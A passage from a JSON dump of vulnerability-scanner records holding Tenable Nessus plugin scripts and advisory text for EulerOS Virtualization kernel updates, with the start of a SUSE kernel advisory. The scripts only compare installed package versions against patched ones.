congestion on the global challenge ACK rate\n limit counter and then measuring the changes by probing\n packets. An off-path attacker could use this flaw to\n either terminate TCP connection and/or inject payload\n into non-secured TCP connection between two endpoints\n on the network.(CVE-2016-5696i1/4%0\n\n - It was found that the Bluebooth Network Encapsulation\n Protocol (BNEP) implementation did not validate the\n type of second socket passed to the BNEPCONNADD\n ioctl(), which could lead to memory corruption. A local\n user with the CAP_NET_ADMIN capability can use this for\n denial of service (crash or data corruption) or\n possibly for privilege escalation. Due to the nature of\n the flaw, privilege escalation cannot be fully ruled\n out, although we feel it is unlikely.(CVE-2017-15868i1/4%0\n\n - A vulnerability was found in the key management\n subsystem of the Linux kernel. An update on an\n uninstantiated key could cause a kernel panic, leading\n to denial of service (DoS).(CVE-2017-15299i1/4%0\n\n - The rfcomm_sock_bind function in\n net/bluetooth/rfcomm/sock.c in the Linux kernel before\n 4.2 allows local users to obtain sensitive information\n or cause a denial of service (NULL pointer dereference)\n via vectors involving a bind system call on a Bluetooth\n RFCOMM socket.(CVE-2015-8956i1/4%0\n\n - arch/mips/include/asm/thread_info.h in the Linux kernel\n before 3.14.8 on the MIPS platform does not configure\n _TIF_SECCOMP checks on the fast system-call path, which\n allows local users to bypass intended PR_SET_SECCOMP\n restrictions by executing a crafted application without\n invoking a trace or audit subsystem.(CVE-2014-4157i1/4%0\n\n - A flaw was found in the Linux kernel's ext4 filesystem\n code. A stack-out-of-bounds write in\n ext4_update_inline_data() is possible when mounting and\n writing to a crafted ext4 image. An attacker could use\n this to cause a system crash and a denial of\n service.(CVE-2018-10880i1/4%0\n\n - The aac_send_raw_srb function in\n drivers/scsi/aacraid/commctrl.c in the Linux kernel\n through 3.12.1 does not properly validate a certain\n size value, which allows local users to cause a denial\n of service (invalid pointer dereference) or possibly\n have unspecified other impact via an\n FSACTL_SEND_RAW_SRB ioctl call that triggers a crafted\n SRB command.(CVE-2013-6380i1/4%0\n\n - Linux kernel built with the KVM visualization support\n (CONFIG_KVM), with nested visualization(nVMX) feature\n enabled(nested=1), is vulnerable to an uncaught\n exception issue. It could occur if an L2 guest was to\n throw an exception which is not handled by an L1\n guest.(CVE-2016-9588i1/4%0\n\n - A flaw was found in the alarm_timer_nsleep() function\n in kernel/time/alarmtimer.c in the Linux kernel. The\n ktime_add_safe() function is not used and an integer\n overflow can happen causing an alarm not to fire if\n using a large relative timeout.(CVE-2018-13053i1/4%0\n\n - net/llc/sysctl_net_llc.c in the Linux kernel before\n 3.19 uses an incorrect data type in a sysctl table,\n which allows local users to obtain potentially\n sensitive information from kernel memory or possibly\n have unspecified other impact by accessing a sysctl\n entry.(CVE-2015-2041i1/4%0\n\n - Incorrect error handling in the set_mempolicy() and\n mbind() compat syscalls in 'mm/mempolicy.c' in the\n Linux kernel allows local users to obtain sensitive\n information from uninitialized stack data by triggering\n failure of a certain bitmap operation.(CVE-2017-7616i1/4%0\n\n - The snd_msnd_interrupt function in\n sound/isa/msnd/msnd_pinnacle.c in the Linux kernel\n through 4.11.7 allows local users to cause a denial of\n service (over-boundary access) or possibly have\n unspecified other impact by changing the value of a\n message queue head pointer between two kernel reads of\n that value, aka a 'double fetch'\n vulnerability.(CVE-2017-9984i1/4%0\n\n - An integer overflow was discovered in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n through 4.12.10. This flaw allows local users to cause\n a denial of service (memory corruption and system\n crash) by leveraging root access.(CVE-2017-14051i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled user controls. A local,\n privileged user could use this flaw to crash the\n system.(CVE-2014-4654i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's Virtual Dynamic Shared Object (vDSO)\n implementation performed address randomization. A\n local, unprivileged user could use this flaw to leak\n kernel memory addresses to user-space.(CVE-2014-9585i1/4%0\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel,\n before 4.13.8, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533i1/4%0\n\n - A divide-by-zero vulnerability was found in the\n __tcp_select_window function in the Linux kernel. This\n can result in a kernel panic causing a local denial of\n service.(CVE-2017-14106i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1530\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b19f2a9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9984\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:22:57", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel handled IRET faults during the processing of NMIs. An unprivileged, local user could use this flaw to crash the system or, potentially (although highly unlikely), escalate their privileges on the system.(CVE-2015-5157)\n\n - A denial of service vulnerability was found in the WhiteHEAT USB Serial Driver (whiteheat_attach function in drivers/usb/serial/whiteheat.c). In the driver, the COMMAND_PORT variable was hard coded and set to 4 (5th element). The driver assumed that the number of ports would always be 5 and used port number 5 as the command port. However, when using a USB device in which the number of ports was set to a number less than 5 (for example, 3), the driver triggered a kernel NULL-pointer dereference. A non-privileged attacker could use this flaw to panic the host.(CVE-2015-5257)\n\n - A NULL pointer dereference flaw was found in the SCTP implementation. A local user could use this flaw to cause a denial of service on the system by triggering a kernel panic when creating multiple sockets in parallel while the system did not have the SCTP module loaded.(CVE-2015-5283)\n\n - It was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #AC (alignment check exception) is handled. A privileged user inside a guest could use this flaw to create denial of service conditions on the host kernel.(CVE-2015-5307)\n\n - A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.(CVE-2015-5364)\n\n - A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.(CVE-2015-5366)\n\n - A cross-boundary flaw was discovered in the Linux kernel software raid driver. The driver accessed a disabled bitmap where only the first byte of the buffer was initialized to zero. This meant that the rest of the request (up to 4095 bytes) was left and copied into user space. An attacker could use this flaw to read private information from user space that would not otherwise have been accessible.(CVE-2015-5697)\n\n - An integer-overflow vulnerability was found in the scsi block-request handling code in function start_req(). A local attacker could use specially crafted IOV requests to overflow a counter used in bio_map_user_iov()'s page calculation, and write past the end of the array that contains kernel-page pointers.(CVE-2015-5707)\n\n - A flaw was found in the way the Linux kernel's vhost driver treated userspace provided log file descriptor when processing the VHOST_SET_LOG_FD ioctl command. The file descriptor was never released and continued to consume kernel memory. A privileged local user with access to the /dev/vhost-net files could use this flaw to create a denial-of-service attack.(CVE-2015-6252)\n\n - A flaw was found in the way the Linux kernel's perf subsystem retrieved userlevel stack traces on PowerPC systems. A local, unprivileged user could use this flaw to cause a denial of service on the system by creating a special stack layout that would force the perf_callchain_user_64() function into an infinite loop.(CVE-2015-6526)\n\n - A NULL-pointer dereference vulnerability was discovered in the Linux kernel. The kernel's Reliable Datagram Sockets (RDS) protocol implementation did not verify that an underlying transport existed before creating a connection to a remote server. A local system user could exploit this flaw to crash the system by creating sockets at specific times to trigger a NULL pointer dereference.(CVE-2015-6937)\n\n - Multiple race conditions in the Advanced Union Filesystem (aufs) aufs3-mmap.patch and aufs4-mmap.patch patches for the Linux kernel 3.x and 4.x allow local users to cause a denial of service (use-after-free and BUG) or possibly gain privileges via a (1) madvise or (2) msync system call, related to mm/madvise.c and mm/msync.c.(CVE-2015-7312)\n\n - A divide-by-zero flaw was discovered in the Linux kernel built with KVM virtualization support(CONFIG_KVM). The flaw occurs in the KVM module's Programmable Interval Timer(PIT) emulation, when PIT counters for channel 1 or 2 are set to zero(0) and a privileged user inside the guest attempts to read these counters. A privileged guest user with access to PIT I/O ports could exploit this issue to crash the host kernel (denial of service).(CVE-2015-7513)\n\n - An out-of-bounds memory access flaw was found in the Linux kernel's aiptek USB tablet driver (aiptek_probe() function in drivers/input/tablet/aiptek.c). The driver assumed that the interface always had at least one endpoint. By using a specially crafted USB device with no endpoints on one of its interfaces, an unprivileged user with physical access to the system could trigger a kernel NULL pointer dereference, causing the system to panic.(CVE-2015-7515)\n\n - A NULL-pointer dereference flaw was found in the kernel, which is caused by a race between revoking a user-type key and reading from it. The issue could be triggered by an unprivileged user with a local account, causing the kernel to crash (denial of service).(CVE-2015-7550)\n\n - A flaw was found in the way the Linux kernel visor driver handles certain invalid USB device descriptors.\n The driver assumes that the device always has at least one bulk OUT endpoint. By using a specially crafted USB device (without a bulk OUT endpoint), an unprivileged user with physical access could trigger a kernel NULL-pointer dereference and cause a system panic (denial of service).(CVE-2015-7566)\n\n - A race condition flaw was found in the way the Linux kernel's IPC subsystem initialized certain fields in an IPC object structure that were later used for permission checking before inserting the object into a globally visible list. A local, unprivileged user could potentially use this flaw to elevate their privileges on the system.(CVE-2015-7613)\n\n - A flaw was discovered in the Linux kernel where issuing certain ioctl() -s commands to the '/dev/ppp' device file could lead to a NULL pointer dereference. A privileged user could use this flaw to cause a kernel crash and denial of service.(CVE-2015-7799)\n\n - It was found that the Linux kernel's keys subsystem did not correctly garbage collect uninstantiated keyrings.\n A local attacker could use this flaw to crash the system or, potentially, escalate their privileges on the system.(CVE-2015-7872)\n\n - A denial of service flaw was discovered in the Linux kernel, where a race condition caused a NULL pointer dereference in the RDS socket-creation code. A local attacker could use this flaw to create a situation in which a NULL pointer crashed the kernel.(CVE-2015-7990)\n\n - It was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #DB (debug exception) is handled. A privileged user inside a guest could use this flaw to create denial of service conditions on the host kernel.(CVE-2015-8104)\n\n - It was found that the Linux kernel's IPv6 network stack did not properly validate the value of the MTU variable when it was set. A remote attacker could potentially use this flaw to disrupt a target system's networking (packet loss) by setting an invalid MTU value, for example, via a NetworkManager daemon that is processing router advertisement packets running on the target system.(CVE-2015-8215)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1488)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5157", "CVE-2015-5257", "CVE-2015-5283", "CVE-2015-5307", "CVE-2015-5364", "CVE-2015-5366", "CVE-2015-5697", "CVE-2015-5707", "CVE-2015-6252", "CVE-2015-6526", "CVE-2015-6937", "CVE-2015-7312", "CVE-2015-7513", "CVE-2015-7515", "CVE-2015-7550", "CVE-2015-7566", "CVE-2015-7613", "CVE-2015-7799", "CVE-2015-7872", "CVE-2015-7990", "CVE-2015-8104", "CVE-2015-8215"], "modified": "2021-02-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1488.NASL", "href": "https://www.tenable.com/plugins/nessus/124812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124812);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2015-5157\",\n \"CVE-2015-5257\",\n \"CVE-2015-5283\",\n \"CVE-2015-5307\",\n \"CVE-2015-5364\",\n \"CVE-2015-5366\",\n \"CVE-2015-5697\",\n \"CVE-2015-5707\",\n \"CVE-2015-6252\",\n \"CVE-2015-6526\",\n \"CVE-2015-6937\",\n \"CVE-2015-7312\",\n \"CVE-2015-7513\",\n \"CVE-2015-7515\",\n \"CVE-2015-7550\",\n \"CVE-2015-7566\",\n \"CVE-2015-7613\",\n \"CVE-2015-7799\",\n \"CVE-2015-7872\",\n \"CVE-2015-7990\",\n \"CVE-2015-8104\",\n \"CVE-2015-8215\"\n );\n script_bugtraq_id(\n 75510,\n 76005\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1488)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel handled\n IRET faults during the processing of NMIs. An\n unprivileged, local user could use this flaw to crash\n the system or, potentially (although highly unlikely),\n escalate their privileges on the system.(CVE-2015-5157)\n\n - A denial of service vulnerability was found in the\n WhiteHEAT USB Serial Driver (whiteheat_attach function\n in drivers/usb/serial/whiteheat.c). In the driver, the\n COMMAND_PORT variable was hard coded and set to 4 (5th\n element). The driver assumed that the number of ports\n would always be 5 and used port number 5 as the command\n port. However, when using a USB device in which the\n number of ports was set to a number less than 5 (for\n example, 3), the driver triggered a kernel NULL-pointer\n dereference. A non-privileged attacker could use this\n flaw to panic the host.(CVE-2015-5257)\n\n - A NULL pointer dereference flaw was found in the SCTP\n implementation. A local user could use this flaw to\n cause a denial of service on the system by triggering a\n kernel panic when creating multiple sockets in parallel\n while the system did not have the SCTP module\n loaded.(CVE-2015-5283)\n\n - It was found that the x86 ISA (Instruction Set\n Architecture) is prone to a denial of service attack\n inside a virtualized environment in the form of an\n infinite loop in the microcode due to the way\n (sequential) delivering of benign exceptions such as\n #AC (alignment check exception) is handled. A\n privileged user inside a guest could use this flaw to\n create denial of service conditions on the host\n kernel.(CVE-2015-5307)\n\n - A flaw was found in the way the Linux kernel's\n networking implementation handled UDP packets with\n incorrect checksum values. A remote attacker could\n potentially use this flaw to trigger an infinite loop\n in the kernel, resulting in a denial of service on the\n system, or cause a denial of service in applications\n using the edge triggered epoll\n functionality.(CVE-2015-5364)\n\n - A flaw was found in the way the Linux kernel's\n networking implementation handled UDP packets with\n incorrect checksum values. A remote attacker could\n potentially use this flaw to trigger an infinite loop\n in the kernel, resulting in a denial of service on the\n system, or cause a denial of service in applications\n using the edge triggered epoll\n functionality.(CVE-2015-5366)\n\n - A cross-boundary flaw was discovered in the Linux\n kernel software raid driver. The driver accessed a\n disabled bitmap where only the first byte of the buffer\n was initialized to zero. This meant that the rest of\n the request (up to 4095 bytes) was left and copied into\n user space. An attacker could use this flaw to read\n private information from user space that would not\n otherwise have been accessible.(CVE-2015-5697)\n\n - An integer-overflow vulnerability was found in the scsi\n block-request handling code in function start_req(). A\n local attacker could use specially crafted IOV requests\n to overflow a counter used in bio_map_user_iov()'s page\n calculation, and write past the end of the array that\n contains kernel-page pointers.(CVE-2015-5707)\n\n - A flaw was found in the way the Linux kernel's vhost\n driver treated userspace provided log file descriptor\n when processing the VHOST_SET_LOG_FD ioctl command. The\n file descriptor was never released and continued to\n consume kernel memory. A privileged local user with\n access to the /dev/vhost-net files could use this flaw\n to create a denial-of-service attack.(CVE-2015-6252)\n\n - A flaw was found in the way the Linux kernel's perf\n subsystem retrieved userlevel stack traces on PowerPC\n systems. A local, unprivileged user could use this flaw\n to cause a denial of service on the system by creating\n a special stack layout that would force the\n perf_callchain_user_64() function into an infinite\n loop.(CVE-2015-6526)\n\n - A NULL-pointer dereference vulnerability was discovered\n in the Linux kernel. The kernel's Reliable Datagram\n Sockets (RDS) protocol implementation did not verify\n that an underlying transport existed before creating a\n connection to a remote server. A local system user\n could exploit this flaw to crash the system by creating\n sockets at specific times to trigger a NULL pointer\n dereference.(CVE-2015-6937)\n\n - Multiple race conditions in the Advanced Union\n Filesystem (aufs) aufs3-mmap.patch and aufs4-mmap.patch\n patches for the Linux kernel 3.x and 4.x allow local\n users to cause a denial of service (use-after-free and\n BUG) or possibly gain privileges via a (1) madvise or\n (2) msync system call, related to mm/madvise.c and\n mm/msync.c.(CVE-2015-7312)\n\n - A divide-by-zero flaw was discovered in the Linux\n kernel built with KVM virtualization\n support(CONFIG_KVM). The flaw occurs in the KVM\n module's Programmable Interval Timer(PIT) emulation,\n when PIT counters for channel 1 or 2 are set to zero(0)\n and a privileged user inside the guest attempts to read\n these counters. A privileged guest user with access to\n PIT I/O ports could exploit this issue to crash the\n host kernel (denial of service).(CVE-2015-7513)\n\n - An out-of-bounds memory access flaw was found in the\n Linux kernel's aiptek USB tablet driver (aiptek_probe()\n function in drivers/input/tablet/aiptek.c). The driver\n assumed that the interface always had at least one\n endpoint. By using a specially crafted USB device with\n no endpoints on one of its interfaces, an unprivileged\n user with physical access to the system could trigger a\n kernel NULL pointer dereference, causing the system to\n panic.(CVE-2015-7515)\n\n - A NULL-pointer dereference flaw was found in the\n kernel, which is caused by a race between revoking a\n user-type key and reading from it. The issue could be\n triggered by an unprivileged user with a local account,\n causing the kernel to crash (denial of\n service).(CVE-2015-7550)\n\n - A flaw was found in the way the Linux kernel visor\n driver handles certain invalid USB device descriptors.\n The driver assumes that the device always has at least\n one bulk OUT endpoint. By using a specially crafted USB\n device (without a bulk OUT endpoint), an unprivileged\n user with physical access could trigger a kernel\n NULL-pointer dereference and cause a system panic\n (denial of service).(CVE-2015-7566)\n\n - A race condition flaw was found in the way the Linux\n kernel's IPC subsystem initialized certain fields in an\n IPC object structure that were later used for\n permission checking before inserting the object into a\n globally visible list. A local, unprivileged user could\n potentially use this flaw to elevate their privileges\n on the system.(CVE-2015-7613)\n\n - A flaw was discovered in the Linux kernel where issuing\n certain ioctl() -s commands to the '/dev/ppp' device\n file could lead to a NULL pointer dereference. A\n privileged user could use this flaw to cause a kernel\n crash and denial of service.(CVE-2015-7799)\n\n - It was found that the Linux kernel's keys subsystem did\n not correctly garbage collect uninstantiated keyrings.\n A local attacker could use this flaw to crash the\n system or, potentially, escalate their privileges on\n the system.(CVE-2015-7872)\n\n - A denial of service flaw was discovered in the Linux\n kernel, where a race condition caused a NULL pointer\n dereference in the RDS socket-creation code. A local\n attacker could use this flaw to create a situation in\n which a NULL pointer crashed the kernel.(CVE-2015-7990)\n\n - It was found that the x86 ISA (Instruction Set\n Architecture) is prone to a denial of service attack\n inside a virtualized environment in the form of an\n infinite loop in the microcode due to the way\n (sequential) delivering of benign exceptions such as\n #DB (debug exception) is handled. A privileged user\n inside a guest could use this flaw to create denial of\n service conditions on the host kernel.(CVE-2015-8104)\n\n - It was found that the Linux kernel's IPv6 network stack\n did not properly validate the value of the MTU variable\n when it was set. A remote attacker could potentially\n use this flaw to disrupt a target system's networking\n (packet loss) by setting an invalid MTU value, for\n example, via a NetworkManager daemon that is processing\n router advertisement packets running on the target\n system.(CVE-2015-8215)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1488\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0073ce36\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5157\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T15:22:04", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various security and bugfixes.\n\nNotable changes in this kernel :\n\n - It is now possible to mount a NFS export on the exporting host directly.\n\nThe following security bugs were fixed :\n\n - CVE-2016-5244: A kernel information leak in rds_inc_info_copy was fixed that could leak kernel stack memory to userspace (bsc#983213).\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does not allow it. This could have lead to local privilege escalation when ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in fs/isofs/rock.c in the Linux kernel mishandles NM (aka alternate name) entries containing \\0 characters, which allowed local users to obtain sensitive information from kernel memory or possibly have unspecified other impact via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in net/x25/x25_facilities.c in the Linux kernel did not properly initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory via an X.25 Call Request (bnc#981267).\n\n - 